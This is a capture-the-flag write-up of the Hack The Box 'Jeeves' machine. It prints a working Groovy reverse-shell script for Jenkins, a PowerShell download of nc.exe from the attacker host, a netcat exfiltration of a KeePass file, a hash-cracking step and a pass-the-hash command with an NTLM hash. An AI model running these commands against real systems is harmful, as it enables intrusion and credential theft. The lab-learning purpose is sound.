Overall Summary
Jeeves is a Windows machine from Hack The box that can be exploited through Jenkins by running a groovy reverse shell. Privilege escalation requires finding a kdbx file and using john the ripper to get password to open it, the file contains some usernames and passwords but to gain administrative privileges we will need to use a technique called “Pass the hash”. Overall, the machine is easy but does require some research to understand to proceed.
Scanning and Enumeration
Exploitation
From this box we can execute Groovy scripts which would allow us to get a reverse shell. To get a reverse shell I’ll use an script from github that can be found here:
https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
and change the addressing information to my IP and port number. This is the script I’ll be using:
String host="10.10.14.21";
int port=443;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Post-Exploitation
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.21/nc.exe','nc.exe')"
nc -lnvp 4321 > CEH.kdbx
nc.exe -nv 10.10.14.21 4321 < C:\Users\kohsuke\Documents\CEH.kdbx
Once I had downloaded the file on my attacking machine I then had to install keepass2 because apparently the version 2 is the one that introduced the kdbx format, I found about this by reading it in the following link:
https://fileinfo.com/extension/kdbx
We can simply install keepass2 by running the following commands in Kali Linux:
sudo apt-get update
sudo apt-get install keepass2
keepass2john CEH.kdbx > tocrack
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe
The Trick About The Flag
dir /r
We can now see the root.txt file but we still need to read it to get the flag. To read the flag we can simply use the “more” command as I learned by reading this article:
http://www.flexhex.com/docs/articles/alternate-streams.phtml. This is the command that can be used to read the flag:
more < hm.txt:root.txt